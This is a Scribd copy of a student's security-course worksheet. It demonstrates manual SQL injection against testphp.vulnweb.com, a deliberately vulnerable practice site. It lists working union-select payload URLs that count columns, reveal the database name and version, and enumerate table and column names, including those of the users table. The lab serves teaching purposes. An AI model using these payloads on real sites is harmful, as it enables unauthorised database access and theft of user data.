Scribd
Upload
14 views7 pages

WMS WS - 3 Ujjawal

wms

Uploaded by

Shashwat Mishra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views7 pages

WMS WS - 3 Ujjawal

wms

Uploaded by

Shashwat Mishra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

WORKSHEET 3

Student Name: Ujjawal Sanadhya UID: 20BCS8242

Section/Group: 20BCS_KRG_WM1-B

Subject Name: Web and Mobile Security

Aim: Design a method to simulate the SQL injection.

Objective: To test SQL injection.

Software/Hardware Requirements: Windows 7 and above


version, Chrome/or any other browser.

Introduction: Acunetix is a web-application security scanner that


gives you a 360- degree various organisation’s security.

This end-to-end web security scanner can identify vulnerabilities like


XSS and misconfigurations. it has capabilities for scanning all types of
apps, complex web applications, etc.

Acunetix offers specialised technologies that let you detect more and
fix faster.

Reading material (reference links):

SQL INJECTIONS:
SQL injection is a code injection technique that might destroy your
database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements,
via web page input.
SQL injection usually occurs when you ask a user for input, like their
username/userid, and instead of a name/id, the user gives you an SQL
statement that you will unknowingly run on your database.

Steps/ Methods/ Coding:

• Open given below targeted URL in the browser.


• Open the link- http://testphp.vulnweb.com/

• Go to- http://testphp.vulnweb.com/listproducts.php?cat=1

You'll inject the malicious code (cheat code)-


http://testphp.vulnweb.com/listproducts.php?cat=-1’

• Put the random number, cheat code:


http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11
clause to check the row (tuple).

Information gathering:
1. To check the database name, Go to:
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,2,3,4,5,6,7,8,9,10,database( )--

2. To check the database version, Go to:


http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,2,3,4,5,6,7,8,9,10,version()--
Information to be fetch:
• Table name:
http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(tabl
e_name)%20from%20information_schema.tables%20where%20
table_schema=database()--

• Column name:

http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(col
umn_name)%20from%20information_schema.columns%20whe
re%20table_name=0x7573657273

You might also like